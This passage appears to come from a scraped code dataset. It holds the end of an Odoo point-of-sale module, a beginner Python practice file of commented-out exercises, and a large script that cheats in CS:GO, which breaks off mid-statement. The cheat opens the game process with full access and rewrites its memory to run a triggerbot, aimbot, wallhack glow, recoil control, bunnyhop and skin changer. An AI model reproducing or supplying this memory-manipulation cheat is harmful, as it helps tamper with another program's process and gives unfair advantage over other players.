draft: Indicate that the pos_order is not validated yet.\n\t\t:param existing_order: order to be updated or False.\n\t\t:type existing_order: pos.order.\n\t\t:returns: id of created/updated pos.order\n\t\t:rtype: int\n\t\t\"\"\"\n\t\torder = order['data']\n\t\tpos_session = self.env['pos.session'].browse(order['pos_session_id'])\n\t\tif pos_session.state == 'closing_control' or pos_session.state == 'closed':\n\t\t\torder['pos_session_id'] = self._get_valid_session(order).id\n\n\t\tpos_order = False\n\t\tif not existing_order:\n\t\t\tpos_order = self.create(self._order_fields(order))\n\t\telse:\n\t\t\tpos_order = existing_order\n\t\t\tpos_order.lines.unlink()\n\t\t\torder['user_id'] = pos_order.user_id.id\n\t\t\tpos_order.write(self._order_fields(order))\n\n\t\tpos_order = pos_order.with_company(pos_order.company_id)\n\t\tself = self.with_company(pos_order.company_id)\n\t\tself._process_payment_lines(order, pos_order, pos_session, draft)\n\n\t\tif not draft and not pos_order.delivery_order:\n\t\t\ttry:\n\t\t\t\tpos_order.action_pos_order_paid()\n\t\t\texcept psycopg2.DatabaseError:\n\t\t\t\t# do not hide transactional errors, the order(s) won't be saved!\n\t\t\t\traise\n\t\t\texcept Exception as e:\n\t\t\t\t_logger.error('Could not fully process the POS Order: %s', tools.ustr(e))\n\n\t\tpos_order._create_order_picking()\n\n\t\tif pos_order.to_invoice and pos_order.state == 'paid':\n\t\t\tpos_order._generate_pos_order_invoice()\n\n\t\treturn 
pos_order.id\n\n\nclass POSSession(models.Model):\n\t_inherit = 'pos.session'\n\n\tdef load_pos_data(self):\n\t\tloaded_data = {}\n\t\tself = self.with_context(loaded_data=loaded_data)\n\t\tfor model in self._pos_ui_models_to_load():\n\t\t\tloaded_data[model] = self._load_model(model)\n\t\tself._pos_data_process(loaded_data) \n\t\tusers_data = self._get_pos_ui_pos_res_users(self._loader_params_pos_res_users())\n\t\tproduct_data = self._get_pos_ui_pos_product_product(self._loader_params_pos_product_product())\n\t\tloaded_data['users'] = users_data\n\t\tloaded_data['product_delivery'] = product_data\n\t\treturn loaded_data\n\n\tdef _loader_params_pos_product_product(self):\n\t\treturn {\n\t\t\t'search_params': {\n\t\t\t\t'domain': ['|', ('sale_ok', '=', True), ('available_in_pos', '=', True)],\n\t\t\t\t'fields': ['display_name', 'list_price','lst_price','pos_categ_id', 'taxes_id', 'barcode', 'default_code', 'to_weight', 'uom_id', 'description_sale', 'description', 'categ_id', 'product_tmpl_id','tracking','is_home_delivery_charge'],\n\t\t\t},\n\t\t}\n\n\tdef _get_pos_ui_pos_product_product(self, params):\n\t\tproducts = self.env['product.product'].search_read(**params['search_params'])\n\t\treturn products\n\n\n\tdef _loader_params_pos_res_users(self):\n\t\treturn {\n\t\t\t'search_params': {\n\t\t\t\t'domain': [],\n\t\t\t\t'fields': ['name', 'groups_id'],\n\t\t\t},\n\t\t}\n\n\tdef _get_pos_ui_pos_res_users(self, params):\n\t\tusers = self.env['res.users'].search_read(**params['search_params'])\n\t\treturn users\n\n\tdef _loader_params_pos_payment_method(self):\n\t\tresult = super()._loader_params_pos_payment_method()\n\t\tresult['search_params']['fields'].append('is_home_delivery')\n\t\treturn result\n\n\tdef _loader_params_res_partner(self):\n\t\tresult = super()._loader_params_res_partner()\n\t\tresult['search_params']['fields'].append('street2')\n\t\treturn result\n\n\tdef get_closing_control_data(self):\n\t\tself.ensure_one()\n\t\torders = self.order_ids.filtered(lambda o: o.delivery_order == True or o.state == 'paid' or o.state == 'invoiced')\n\t\tpayments = orders.payment_ids.filtered(lambda p: p.payment_method_id.type != \"pay_later\")\n\t\tpay_later_payments = orders.payment_ids - payments\n\t\tcash_payment_method_ids = self.payment_method_ids.filtered(lambda pm: pm.type == 'cash')\n\t\tdefault_cash_payment_method_id = cash_payment_method_ids[0] if cash_payment_method_ids else None\n\t\ttotal_default_cash_payment_amount = sum(payments.filtered(lambda p: p.payment_method_id == default_cash_payment_method_id).mapped('amount')) if default_cash_payment_method_id else 0\n\t\tother_payment_method_ids = self.payment_method_ids - default_cash_payment_method_id if default_cash_payment_method_id else self.payment_method_ids\n\t\tcash_in_count = 0\n\t\tcash_out_count = 0\n\t\tcash_in_out_list = []\n\t\tfor cash_move in self.statement_line_ids.sorted('create_date'):\n\t\t\tif cash_move.amount > 0:\n\t\t\t\tcash_in_count += 1\n\t\t\t\tname = f'Cash in {cash_in_count}'\n\t\t\telse:\n\t\t\t\tcash_out_count += 1\n\t\t\t\tname = f'Cash out {cash_out_count}'\n\t\t\tcash_in_out_list.append({\n\t\t\t\t'name': cash_move.payment_ref if cash_move.payment_ref else name,\n\t\t\t\t'amount': cash_move.amount\n\t\t\t})\n\n\t\treturn {\n\t\t\t'orders_details': {\n\t\t\t\t'quantity': len(orders),\n\t\t\t\t'amount': sum(orders.mapped('amount_total'))\n\t\t\t},\n\t\t\t'payments_amount': sum(payments.mapped('amount')),\n\t\t\t'pay_later_amount': sum(pay_later_payments.mapped('amount')),\n\t\t\t'opening_notes': 
self.opening_notes,\n\t\t\t'default_cash_details': {\n\t\t\t\t'name': default_cash_payment_method_id.name,\n\t\t\t\t'amount': self.cash_register_balance_start \n\t\t\t\t\t\t\t+ total_default_cash_payment_amount \n\t\t\t\t\t\t\t+ sum(self.statement_line_ids.mapped('amount')),\n\t\t\t\t'opening': self.cash_register_balance_start,\n\t\t\t\t'payment_amount': total_default_cash_payment_amount,\n\t\t\t\t'moves': cash_in_out_list,\n\t\t\t\t'id': default_cash_payment_method_id.id\n\t\t\t} if default_cash_payment_method_id else None,\n\t\t\t'other_payment_methods': [{\n\t\t\t\t'name': pm.name,\n\t\t\t\t'amount': sum(orders.payment_ids.filtered(lambda p: p.payment_method_id == pm).mapped('amount')),\n\t\t\t\t'number': len(orders.payment_ids.filtered(lambda p: p.payment_method_id == pm)),\n\t\t\t\t'id': pm.id,\n\t\t\t\t'type': pm.type,\n\t\t\t} for pm in other_payment_method_ids],\n\t\t\t'is_manager': self.user_has_groups(\"point_of_sale.group_pos_manager\"),\n\t\t\t'amount_authorized_diff': self.config_id.amount_authorized_diff if self.config_id.set_maximum_difference else None\n\t\t}","repo_name":"amg15490/KK","sub_path":"pos_home_delivery/models/pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":10275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70155460212","text":"# name = input(\"hello, whats your name? \")\n# print(\"hello {0}\".format(name))\n# age = int(input(\"how old are u? \"))\n#\n# if (age < 18) or (age >30):\n# print('sorry u cant go with us')\n# else:\n# print(\"great, u can go with us {0}\".format(name))\n\n# for b in range(-10,-2):\n# print(\"number {}\".format(b))\n\n# shoping_list = [\"milk\", \"coffe\", \"bread\", \"bacon\"]\n# for item in shoping_list:\n# print(\"=====\")\n# if item == 'milk':\n# continue\n# print(\"buy \"+item)\n\n# ip = input(\"enter ip: \")\n#\n# segment = 1\n# lenght = 0\n# char = \"\"\n# for char in ip:\n# if char == \".\":\n# print(\"segment {} contain {} numbers\".format(segment, lenght))\n# segment += 1\n# lenght = 0\n# else:\n# lenght += 1\n# if char != \".\":\n# print(\"segment {} contain {} numbers\".format(segment, lenght))\n\n# exits = ['1', '2', '3']\n#\n# taken = \"\"\n# while taken not in exits:\n# exits = input(\"choose exit: \")\n# if taken == exits:\n# print(\"good choice\")\n# else:\n# print(\"wrong guess\")\n#\n# farm = {\"cow\", \"pig\", \"dog\"}\n#\n#\n# for anim in farm:\n# print(anim)\n# print('='*40)\n#\n# farm.add(\"horse\")\n# print(anim)\n# from typing import Tuple, List\n\n# even = set(range(0, 20, 2))\n# print(even)\n# print(len(even))\n# print('='*40)\n#\n# print(sorted(even))\n#\n# square_t = (4, 16, 36, 64)\n# square = set(square_t)\n# print(even.union(square))\n# print(len(even.union(square)))\n# print('='*40)\n# print(even.intersection(even))\n# print(even&square)\n# words = []\n# words = input(\"type something: \")\n#\n# print(sorted(words))\n#\n# vowels = frozenset(\"a\")\n#\n# print(sorted(vowels.symmetric_difference(words)))\n\n# jab = open(\"sample.txt\", 'r')\n# for line in jab:\n# if \"\\n\" in line:\n# print(sorted(line), end='')\n# break\n# # else:\n# # print(sorted(line))\n#\n# jab.close()\n#\n# with open(\"sample.txt\", 'r') as jab:\n# for line in jab:\n# if \"\\n\" in jab:\n# print(sorted(line))\n# break\n\n# cities = [\"dublin\", \"cork\", \"kilkenny\"]\n#\n# with open(\"cities.txt\", 'w') as city_file:\n# for city in cities:\n# print(city, file=city_file)\n\n# import turtle\n# import time\n#\n# turtle.forward(150)\n# 
turtle.right(250)\n# turtle.forward(150)\n#\n# time.sleep(10)\n\n# for i in dir(__builtins__):\n# print(i)\n#\n# import webbrowser\n#\n# chrome = webbrowser.get(using='chrome')\n#\n# chrome.open_new_tab(\"https://www.python.org\")\n\n# import time\n\n# print(time.gmtime(0))\n#\n# print(time.localtime())\n#\n# print(time.time())\n\n# import time\n# from time import perf_counter as timer\n# import random\n#\n#\n# print(\"press enter to start \")\n#\n# wait_time = random.randint(1, 6)\n# time.sleep(wait_time)\n# start_time = timer()\n# input(\"press enter to stop\")\n#\n# end_time = timer()\n#\n# print(\"started at \" + time.strftime(\"%X\", time.localtime(start_time)))\n# print(\"ended at \" + time.strftime(\"%X\", time.localtime(end_time)))\n#\n# print(\"your reaction time was {} seconds\".format(end_time - start_time))\n\n# from time import monotonic\n#\n# monotonic()\n#\n# from time import perf_counter\n#\n# print(perf_counter())\n\n# import time\n#\n# print(\"Epoch on this system starts at: \" + time.strftime('%c', time.gmtime(0)))\n#\n# print(\"Current timezone is {0} with offset of {1}\".format(time.tzname[0], time.timezone))\n#\n# if time.daylight != 0:\n# print(\"Daylight saving is in effect in this location\")\n# print(\"DTS timezone is \" + time.tzname[1])\n#\n# print(\"Local time is: \" + time.strftime('%Y-%m-%d %H:%M', time.localtime()))\n# print(\"UTC time is \" + time.strftime('%Y/%m/%d %H:%M', time.gmtime()))\n\n# import pytz\n# import datetime\n\nimport ctypes\nimport os\nfrom ctypes import *\nfrom ctypes.wintypes import *\nimport psutil\nimport sys\nimport win32api\nimport win32con\nfrom ctypes import wintypes\nimport time\nimport struct\nimport thread\nimport random\nimport math\nimport numpy\nimport binascii\n\n\n\nclear = lambda: os.system('cls')\n\noff_teamnum = 0xF0\noff_flags = 0x100\noff_incrosshair = 0xB2B4\noff_health = 0xFC\noff_glowindex = 0xA320\noff_vecorigin = 0x134\noff_velocity = 0x110\noff_shotsfired = 0xA2C0\noff_spotted = 0x00000939\noff_dormant = 0x000000E9\noff_aimpunch = 0x301C\noff_vecviewoffset = 0x104\noff_bonematrix = 0x00002698\noff_dwviewangle = 0x4D10\noff_clientdll = 0\n\noff_localplayer = 0xAAFFEC\noff_entitylist = 0x4A8C844\noff_forcejump = 0x4F237DC\noff_glowobject = 0x4FA9848\noff_clientstate = 0x5A3334\n\n\noff_activeweapon = 0x2EE8\noff_itemidlow = 0x2FA4\noff_itemidhigh = 0x2FA0\noff_fallbackpaintkit = 0x3170\noff_fallbackseed = 0x3174\noff_fallbackwear = 0x3178\noff_itemdefinition = 0x2F88\noff_weaponid = 0x000032EC\n\n\nswitch = True\ntriggeronoff = False\nglowonoff = True\nbhoponoff = True\ncleverglowonoff = False\naimonoff = False\nrcsonoff = True\ntest = True\n\naimbone = 8\naimfov = 1.5\ntriggerdelay = 0.0\n\n\n\nclass THREADENTRY32(Structure):\n _fields_ = [\n ('dwSize' , c_long ),\n ('cntUsage' , c_long),\n ('th32ThreadID' , c_long),\n ('th32OwnerProcessID' , c_long),\n ('tpBasePri' , c_long),\n ('tpDeltaPri' , c_long),\n ('dwFlags' , c_long) ]\n\nclass MODULEENTRY32(Structure):\n _fields_ = [ ( 'dwSize' , c_long ) ,\n ( 'th32ModuleID' , c_long ),\n ( 'th32ProcessID' , c_long ),\n ( 'GlblcntUsage' , c_long ),\n ( 'ProccntUsage' , c_long ) ,\n ( 'modBaseAddr' , c_long ) ,\n ( 'modBaseSize' , c_long ) ,\n ( 'hModule' , c_void_p ) ,\n ( 'szModule' , c_char * 256 ),\n ( 'szExePath' , c_char * 260 ) ]\n\nModule32First = windll.kernel32.Module32First\nModule32First.argtypes = [ c_void_p , POINTER(MODULEENTRY32) ]\nModule32First.rettype = c_int\n## Module32Next\nModule32Next = windll.kernel32.Module32Next\nModule32Next.argtypes = [ 
c_void_p , POINTER(MODULEENTRY32) ]\nModule32Next.rettype = c_int\n## Thread32First\nThread32First = windll.kernel32.Thread32First\nThread32First.argtypes = [ c_void_p , POINTER(THREADENTRY32) ]\nThread32First.rettype = c_int\n## Thread32Next\nThread32Next = windll.kernel32.Thread32Next\nThread32Next.argtypes = [ c_void_p , POINTER(THREADENTRY32) ]\nThread32Next.rettype = c_int\n## GetLastError\nGetLastError = windll.kernel32.GetLastError\nGetLastError.rettype = c_long\n\n\n\n\nCreateToolhelp32Snapshot = windll.kernel32.CreateToolhelp32Snapshot\ndef GetModuleBase(PID,ModuleName):\n hModuleSnap = CreateToolhelp32Snapshot( 0x00000008, PID );\n me32 = MODULEENTRY32()\n me32.dwSize = sizeof(MODULEENTRY32)\n Module32First( hModuleSnap, byref(me32))\n base = None\n while True:\n if (me32.szModule.lower()==ModuleName.lower()):\n base=me32.modBaseAddr\n break\n if not Module32Next(hModuleSnap, byref(me32)):\n break\n CloseHandle(hModuleSnap)\n return base\n\ntaskid = \"nothing\"\nOpenProcess = windll.kernel32.OpenProcess\nCloseHandle = windll.kernel32.CloseHandle\nPROCESS_ALL_ACCESS = 0x1F0FFF\n\nfor proc in psutil.process_iter():\n if proc.name() == \"csgo.exe\":\n taskid = proc.pid\n (taskid)\n print(\"Found csgo, script will start...\")\n\nif taskid == \"nothing\":\n raw_input(\"Please make sure csgo is running, script will exit now...\")\n quit()\n\n\n\n\noff_clientdll = GetModuleBase(taskid, \"client.dll\")\noff_enginedll = GetModuleBase(taskid, \"engine.dll\")\n\nbuffer1 = c_char_p(b\"\")\nval1 = c_int()\nbufferSize1 = len(buffer1.value)\nbytesRead1 = c_ulong(0)\n\nbuffer2 = c_char_p(b\"\")\nval2 = c_int()\nbufferSize2 = len(buffer2.value)\nbytesRead2 = c_ulong(0)\n\n\n\n\n\ngame = windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, 0, taskid)\nReadProcessMemory = windll.kernel32.ReadProcessMemory\nWriteProcessMemory = windll.kernel32.WriteProcessMemory\n\n\n\ndef getlenght(type):\n if type == \"i\":\n return 4\n elif type == \"f\":\n return 4\n elif type == \"c\":\n return 1\n\ndef float_to_hex(f):\n return struct.pack('f', f)\n\ndef read_memory(game, address, type):\n buffer = (ctypes.c_byte * getlenght(type))()\n bytesRead = ctypes.c_ulonglong(0)\n readlenght = getlenght(type)\n ReadProcessMemory(game, address, buffer, readlenght, byref(bytesRead))\n return struct.unpack(type, buffer)[0]\n\ndef write_memory(game, address, data, type):\n count = c_ulong(0)\n if type == \"f\":\n buffer = (float_to_hex(data))\n\n elif type == \"i\":\n buffer = struct.pack(\"i\", data)\n\n elif type == \"c\":\n buffer = chr(data)\n\n lenght = getlenght(type)\n WriteProcessMemory(game, address, buffer, lenght, byref(count))\n\n\ndef printer():\n clear()\n print(\"Settings: +++ Aimfov = \" + str(aimfov) + \" +++ Aimbone: \" + str(aimbone) + \" +++ Triggerdelay: \" + str(triggerdelay) + \" +++\")\n print(\"\")\n print(\"\")\n print(\"\")\n print(\"\")\n print(\" - Bunnyhop: \" + str(bhoponoff))\n print(\"\")\n print(\" - Triggerbot: \" + str(triggeronoff))\n print(\"\")\n print(\" - Glow: \" + str(glowonoff))\n print(\"\")\n print(\" - Cleverglow: \" + str(cleverglowonoff))\n print(\"\")\n print(\" - Recoilsystem: \" + str(rcsonoff))\n print(\"\")\n print(\" - Aimbot: \" + str(aimonoff))\n print(\"\")\n\n\n\n\ndef triggerthread():\n while switch:\n if triggeronoff:\n time.sleep(0.01)\n locaplayer = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n myteam = read_memory(game,(locaplayer + off_teamnum), \"i\")\n incrosshair = read_memory(game,(locaplayer + off_incrosshair), \"i\")\n if incrosshair != 0:\n 
incrosshair_entity = read_memory(game,(off_clientdll + off_entitylist + ((incrosshair -1) * 0x10)), \"i\")\n incrosshair_team = read_memory(game,(incrosshair_entity + off_teamnum), \"i\")\n #one = read_memory(game,(incrosshair_entity + 0x8), \"i\")\n #two = read_memory(game,(one + 2 * 0x4), \"i\")\n #three = read_memory(game,(two + 0x1), \"i\")\n #classid = read_memory(game,(three + 0x14), \"i\")\n\n\n if myteam != incrosshair_team: #and classid == 35:\n if triggerdelay > 0:\n time.sleep(triggerdelay)\n\n if win32api.GetAsyncKeyState(0x39) == False:\n\n ctypes.windll.user32.mouse_event(2, 0, 0, 0,0)\n ctypes.windll.user32.mouse_event(4, 0, 0, 0,0)\n\n\n\ndef bhopthread():\n while switch:\n if bhoponoff:\n time.sleep(0.01)\n locaplayer1 = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n flags = read_memory(game,(locaplayer1 + off_flags), \"i\")\n\n if flags & (1 << 0) and win32api.GetAsyncKeyState(0x12):\n write_memory(game, (off_clientdll + off_forcejump), 6, \"i\")\n\n\ndef glowthread():\n while switch:\n if glowonoff:\n time.sleep(0.01)\n glowlocalplayer = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n\n glowpointer = read_memory(game,(off_clientdll + off_glowobject), \"i\")\n\n glowteam = read_memory(game,(glowlocalplayer + off_teamnum), \"i\")\n\n for i in range(1, 64):\n\n player = read_memory(game,(off_clientdll + off_entitylist + ((i -1) * 0x10)), \"i\")\n\n\n\n health = read_memory(game,(player + off_health), \"i\")\n\n\n glowteam_enemy = read_memory(game,(player + off_teamnum), \"i\")\n\n\n inject = read_memory(game,(player + off_glowindex), \"i\")\n\n\n if health > 0 and glowteam != glowteam_enemy:\n\n\n red = ((255 - 2.55 * health) / 255)\n if red > 1:\n red = 1.0\n green = ((2.55*health) / 255)\n if green > 1.0:\n green = 1.0\n\n write_memory(game, (glowpointer + (inject * 0x38 + 0x4)), red, \"f\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x8)), green, \"f\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0xC)), 0.0, \"f\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x10)), 0.8, \"f\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x24)), True, \"c\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x25)), False, \"c\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x26)), False, \"c\")\n\n\n\ndef cleverglow():\n while switch:\n if cleverglowonoff:\n time.sleep(0.01)\n\n cleverglowlocalplayer = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n\n cleverglowpointer = read_memory(game,(off_clientdll + off_glowobject), \"i\")\n\n cleverglowteam = read_memory(game,(cleverglowlocalplayer + off_teamnum), \"i\")\n\n for z in range(1, 64):\n\n cleverglowplayer = read_memory(game,(off_clientdll + off_entitylist + ((z -1) * 0x10)), \"i\")\n\n\n\n\n\n cleverglowhealth = read_memory(game,(cleverglowplayer + off_health), \"i\")\n cleverglowteam_enemy = read_memory(game,(cleverglowplayer + off_teamnum), \"i\")\n\n\n\n if cleverglowhealth > 0 and cleverglowteam != cleverglowteam_enemy:\n\n localplayerx = read_memory(game,(cleverglowlocalplayer + off_vecorigin), \"f\")\n localplayery = read_memory(game,(cleverglowlocalplayer + off_vecorigin + 0x04), \"f\")\n\n\n\n enemyx = read_memory(game,(cleverglowplayer + off_vecorigin), \"f\")\n enemyy = read_memory(game,(cleverglowplayer + off_vecorigin + 0x04), \"f\")\n\n\n distx = localplayerx - enemyx\n disty = localplayery - enemyy\n\n finaldist = ((distx * distx) + (disty * disty))\n finaldist = (math.sqrt(finaldist))\n cleverglowpointer = 
read_memory(game,(off_clientdll + off_glowobject), \"i\")\n cleverinject = read_memory(game,(cleverglowplayer + off_glowindex), \"i\")\n dormant = read_memory(game,(cleverglowplayer + off_dormant), \"i\")\n spotted = read_memory(game,(cleverglowplayer + off_spotted), \"i\")\n cleverglowspeed = read_memory(game,(cleverglowplayer + off_velocity), \"f\")\n\n if finaldist < 1300 and cleverglowspeed > 130:\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x4)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x8)), 0.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0xC)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x10)), 0.7, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x24)), True, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x25)), False, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x26)), False, \"c\")\n elif dormant > 0 or spotted != 0:\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x4)), 0.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x8)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0xC)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x10)), 0.7, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x24)), True, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x25)), False, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x26)), False, \"c\")\n\n\n if cleverglowhealth > 0 and cleverglowteam == cleverglowteam_enemy:\n cleverinject = read_memory(game,(cleverglowplayer + off_glowindex), \"i\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x4)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x8)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0xC)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x10)), 0.7, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x24)), True, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x25)), False, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x26)), False, \"c\")\n\n\ndef normalizeAngles(viewAngleX, viewAngleY):\n if viewAngleX > 89:\n viewAngleX -= 360\n if viewAngleX < -89:\n viewAngleX += 360\n if viewAngleY > 180:\n viewAngleY -= 360\n if viewAngleY < -180:\n viewAngleY += 360\n\n return viewAngleX, viewAngleY\n\n\ndef checkangles(x, y):\n if x > 89:\n return False\n elif x < -89:\n return False\n elif y > 360:\n return False\n elif y < -360:\n return False\n else:\n return True\n\n\ndef nanchecker(first, second):\n if math.isnan(first) or math.isnan(second):\n return False\n else:\n return True\n\n\ndef calc_distance(current_x, current_y, new_x, new_y):\n\n distancex = new_x - current_x\n if distancex < -89:\n distancex += 360\n elif distancex > 89:\n distancex -= 360\n if distancex < 0.0:\n distancex = -distancex\n\n distancey = new_y - current_y\n if distancey < -180:\n distancey += 360\n elif distancey > 180:\n distancey -= 360\n if distancey < 0.0:\n distancey = -distancey\n\n return distancex, distancey\n\n\n\n\n\n\n\n\ndef aimthread():\n oldoffpunchx = 0.0\n oldoffpunchy = 0.0\n while switch:\n if test:\n time.sleep(0.01)\n aimlocalplayer = read_memory(game,(off_clientdll + off_localplayer), 
\"i\")\n\n aimteam = read_memory(game,(aimlocalplayer + off_teamnum), \"i\")\n enginepointer = read_memory(game,(off_enginedll + off_clientstate), \"i\")\n #print viewanglex\n #print viewangley\n\n\n for y in range(1, 64):\n\n aimplayer = read_memory(game,(off_clientdll + off_entitylist + ((y -1) * 0x10)), \"i\")\n\n\n\n aimplayerteam = read_memory(game,(aimplayer + off_teamnum), \"i\")\n aimplayerhealth = read_memory(game,(aimplayer + off_health), \"i\")\n\n if aimplayerteam != aimteam and aimplayerhealth > 0:\n vecorigin = read_memory(game,(aimlocalplayer + off_vecorigin), \"i\")\n localpos1 = read_memory(game,(aimlocalplayer + off_vecorigin), \"f\") + read_memory(game,(vecorigin + off_vecviewoffset + 0x104), \"f\")\n localpos2 = read_memory(game,(aimlocalplayer + off_vecorigin + 0x4), \"f\") + read_memory(game,(vecorigin + off_vecviewoffset + 0x108), \"f\")\n localpos3 = read_memory(game,(aimlocalplayer + off_vecorigin + 0x8), \"f\") + read_memory(game,(aimlocalplayer + 0x10C), \"f\")\n\n\n\n vecorigin = read_memory(game,(aimplayer + off_vecorigin), \"i\")\n aimplayerbones = read_memory(game,(aimplayer + off_bonematrix), \"i\")\n enemypos1 = read_memory(game,(aimplayerbones + 0x30 * aimbone + 0x0C), \"f\")\n enemypos2 = read_memory(game,(aimplayerbones + 0x30 * aimbone + 0x1C), \"f\")\n enemypos3 = read_memory(game,(aimplayerbones + 0x30 * aimbone + 0x2C), \"f\")\n targetline1 = enemypos1 - localpos1\n targetline2 = enemypos2 - localpos2\n targetline3 = enemypos3 - localpos3\n\n viewanglex = read_memory(game,(enginepointer + off_dwviewangle), \"f\")\n viewangley = read_memory(game,(enginepointer + off_dwviewangle + 0x4), \"f\")\n offpunchx = read_memory(game,(aimlocalplayer + off_aimpunch), \"f\")\n offpunchy = read_memory(game,(aimlocalplayer + off_aimpunch + 0x4), \"f\")\n\n if targetline2 == 0 and targetline1 == 0:\n yaw = 0\n if targetline3 > 0:\n pitch = 270\n else:\n pitch = 90\n else:\n yaw = (math.atan2(targetline2, targetline1) * 180 / math.pi ) - (offpunchy * 2)\n if yaw < 0:\n yaw += 360\n hypotenuse = math.sqrt((targetline1*targetline1) + (targetline2*targetline2) + (targetline3*targetline3))\n pitch = (math.atan2(-targetline3, hypotenuse) * 180 / math.pi) - (offpunchx * 2)\n if pitch < 0:\n pitch += 360\n\n\n pitch, yaw = normalizeAngles(pitch, yaw)\n if checkangles(pitch, yaw):\n\n\n distance_x, distance_y = calc_distance(viewanglex, viewangley, pitch, yaw)\n\n\n if (distance_x < aimfov and distance_y < aimfov and win32api.GetAsyncKeyState(0x14)):\n\n if nanchecker(pitch, yaw):\n\n write_memory(game,(enginepointer + off_dwviewangle), pitch, \"f\")\n write_memory(game,(enginepointer + (off_dwviewangle + 0x4)), yaw, \"f\")\n\n\n\n elif (distance_x < aimfov and distance_y < aimfov and read_memory(game,(aimlocalplayer + off_shotsfired), \"i\") >= 1 and aimonoff) and aimonoff:\n\n if nanchecker(pitch, yaw):\n\n write_memory(game,(enginepointer + off_dwviewangle), pitch, \"f\")\n write_memory(game,(enginepointer + (off_dwviewangle + 0x4)), yaw, \"f\")\n\n\n\n\n\n\n\n\n\n\n\n\ndef recoilsystem():\n oldpunchx = 0.0\n oldpunchy = 0.0\n while switch:\n time.sleep(0.01)\n if rcsonoff:\n\n rcslocalplayer = read_memory(game,(off_clientdll +off_localplayer), \"i\")\n rcsengine = read_memory(game,(off_enginedll + off_clientstate), \"i\")\n if read_memory(game,(rcslocalplayer + off_shotsfired), \"i\") > 2:\n\n rcs_x = read_memory(game,(rcsengine + off_dwviewangle), \"f\")\n rcs_y = read_memory(game,(rcsengine + off_dwviewangle + 0x4), \"f\")\n\n punchx = read_memory(game,(rcslocalplayer + 
off_aimpunch), \"f\")\n                punchy = read_memory(game,(rcslocalplayer + off_aimpunch + 0x4), \"f\")\n\n                newrcsx = rcs_x - (punchx - oldpunchx) * 2.0\n                newrcsy = rcs_y - (punchy - oldpunchy) * 2.0\n                newrcsx, newrcsy = normalizeAngles(newrcsx, newrcsy)\n\n\n\n\n                oldpunchx = punchx\n                oldpunchy = punchy\n\n\n\n                if nanchecker(newrcsx, newrcsy) and checkangles(newrcsx, newrcsy):\n\n                    write_memory(game,(rcsengine + off_dwviewangle), newrcsx, \"f\")\n                    write_memory(game,(rcsengine + off_dwviewangle + 0x4), newrcsy, \"f\")\n\n\n\n            else:\n                oldpunchx = 0.0\n                oldpunchy = 0.0\n                newrcsx = 0.0\n                newrcsy = 0.0\n\n\n\ndef skinchanger():\n    while switch:\n        time.sleep(0.01)\n        if win32api.GetAsyncKeyState(0x2D):\n            knifeengine = read_memory(game,(off_enginedll + off_clientstate), \"i\")\n            knifeplayer = read_memory(game, (off_clientdll + off_localplayer), \"i\")\n            current_weapon = read_memory(game, (knifeplayer + off_activeweapon), \"i\")\n            current_weapon &= 0xFFF\n            weapon_entity = read_memory(game, (off_clientdll + off_entitylist + (current_weapon -1) * 0x10), \"i\")\n            currentweapon = read_memory(game, (weapon_entity + off_weaponid), \"i\")\n            currentskinid = read_memory(game, (weapon_entity + off_fallbackpaintkit), \"i\")\n\n            write_memory(game,(weapon_entity + off_itemidhigh), 0, \"i\")\n            write_memory(game,(weapon_entity + off_itemidlow), -1, \"i\")\n            write_memory(game,(weapon_entity + off_fallbackpaintkit), 474, \"i\")\n            write_memory(game,(weapon_entity + off_fallbackwear), 0.000001, \"f\")\n\n\n            if currentskinid != read_memory(game, (weapon_entity + off_fallbackpaintkit), \"i\"):\n                write_memory(game,(knifeengine + 0x16C), -1, \"i\")\n\n\n\n\n\nthread.start_new_thread(triggerthread, ())\nthread.start_new_thread(bhopthread, ())\nthread.start_new_thread(glowthread, ())\nthread.start_new_thread(cleverglow, ())\nthread.start_new_thread(aimthread, ())\nthread.start_new_thread(recoilsystem, ())\n#thread.start_new_thread(skinchanger, ())\n\n\n\n\n\nprinter()\n\n\nwhile switch:\n    if win32api.GetAsyncKeyState(0x37):\n        time.sleep(0.2)\n        if bhoponoff:\n            bhoponoff = False\n        else:\n            bhoponoff = True\n\n        printer()\n\n    elif win32api.GetAsyncKeyState(0x38):\n        time.sleep(0.2)\n        if 